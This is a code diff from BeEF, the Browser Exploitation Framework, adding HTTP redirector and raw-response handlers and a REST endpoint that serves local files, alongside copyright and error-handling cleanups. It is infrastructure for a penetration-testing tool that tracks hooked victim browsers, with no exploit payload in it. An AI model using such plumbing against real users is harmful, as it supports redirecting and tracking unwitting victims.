@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/hookedbrowser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/log.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/optioncache.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/result.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/user.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -24,6 +24,38 @@ module Handlers
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
+    # Binds raw HTTP to a mount point
+    # @param [Integer] status HTTP status code to return
+    # @param [String] headers HTTP headers as a JSON string to return
+    # @param [String] body HTTP body to return
+    # @param [String] path URL path to mount the asset to TODO (can be nil for random path)
+    # @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
+    def bind_raw(status, header, body, path=nil, count=-1)
+      url = build_url(path,nil)
+      @allocations[url] = {}
+      @http_server.mount(
+        url,
+        BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
+      )
+      @http_server.remap
+      print_info "Raw HTTP bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
     # @param [String] path URL path to mount the asset to (can be nil for random path)

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/raw.rb

@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        class Raw
+
+	        def initialize(status, header={}, body)
+	        	@status  = status
+	                @header  = header
+	                @body    = body
+	        end
+
+	        def call(env)
+	            [@status, @header, @body]
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/handlers/redirector.rb

@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        # @todo Add new options to specify what kind of redirect you want to achieve
+        class Redirector
+
+	        @target = "" 	
+
+	        def initialize(target)
+	        	@target = target
+	        end
+
+	        def call(env)
+	        	@response = Rack::Response.new(
+	        		body = ['302 found'],
+	        		status = 302,
+	        		header = {
+	        			'Content-Type' => 'text',
+	        			'Location' => @target
+	        		}
+	        	)
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/websocket/websocket.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -94,7 +94,7 @@ module BeEF
           #              execute(msg_hash)
           #            end
           #          }
-          #        rescue Exception => e
+          #        rescue => e
           #          print_error "WebSocket-secured error: #{e}"
           #        end
           #      end
@@ -150,7 +150,7 @@ module BeEF
           #            execute(msg_hash)
           #          end
           #        }
-          #      rescue Exception => e
+          #      rescue => e
           #        print_error "WebSocket error: #{e}"
           #      end
           #    end
@@ -203,7 +203,7 @@ module BeEF
                       execute(msg_hash)
                     end
                   }
-                rescue Exception => e
+                rescue => e
                   print_error "WebSocket error: #{e}"
                 end
               end

core/main/rest/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -37,12 +37,19 @@ module BeEF
         end
       end
 
+      module RegisterServerHandler
+        def self.mount_handler(server)
+          server.mount('/api/server', BeEF::Core::Rest::Server.new)
+        end
+      end
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
 
       #
       # Check the source IP is within the permitted subnet

core/main/rest/handlers/admin.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -52,7 +52,7 @@ module BeEF
                 "token" => "#{config.get('beef.api_token')}"
               }.to_json
             end
-          rescue Exception => e
+          rescue => e
             error 400
           end
         end

core/main/rest/handlers/categories.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -72,15 +72,15 @@ module BeEF
            details = BeEF::Core::Models::BrowserDetails
 
            {
-               'id' => hb.id,
-               'session' => hb.session,
-               'name' => details.get(hb.session, 'BrowserName'),
-               'version' => details.get(hb.session, 'BrowserVersion'),
-               'os' => details.get(hb.session, 'OsName'),
-               'platform' => details.get(hb.session, 'SystemPlatform'),
-               'ip' => hb.ip,
-               'domain' => details.get(hb.session, 'HostName'),
-               'port' => hb.port.to_s,
+               'id'       => hb.id,
+               'session'  => hb.session,
+               'name'     => details.get(hb.session, 'BrowserName'),
+               'version'  => details.get(hb.session, 'BrowserVersion'),
+               'os'       => details.get(hb.session, 'OsName'),
+               'platform' => details.get(hb.session, 'BrowserPlatform'),
+               'ip'       => hb.ip,
+               'domain'   => details.get(hb.session, 'HostName'),
+               'port'     => hb.port.to_s,
                'page_uri' => details.get(hb.session, 'PageURI')
            }
         end
@@ -88,4 +88,4 @@ module BeEF
       end
     end
   end
-end
+end

core/main/rest/handlers/logs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -149,7 +149,7 @@ module BeEF
             data.each{|k,v| options.push({'name' => k, 'value' => v})}
             exec_results = BeEF::Module.execute(modk, params[:session], options)
             exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
-          rescue Exception => e
+          rescue => e
             print_error "Invalid JSON input for module '#{params[:mod_id]}'"
             error 400 # Bad Request
           end
@@ -203,7 +203,7 @@ module BeEF
               end
             end
             results.to_json
-          rescue Exception => e
+          rescue => e
             print_error "Invalid JSON input passed to endpoint /api/modules/multi"
             error 400 # Bad Request
           end
@@ -265,7 +265,7 @@ module BeEF
               }
             end
             results.to_json
-          rescue Exception => e
+          rescue => e
             print_error "Invalid JSON input passed to endpoint /api/modules/multi"
             error 400 # Bad Request
           end

core/main/rest/handlers/server.rb

@@ -0,0 +1,41 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Server < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+        http_server = BeEF::Core::Server.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+
+        # @note Binds a local file to a specified path in BeEF's web server
+        post '/bind' do
+          request.body.rewind
+          begin
+            data = JSON.parse request.body.read
+            mount = data['mount']
+            local_file = data['local_file']
+            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
+            status 200
+          rescue => e
+            error 400
+          end
+        end
+      end
+    end
+  end
+end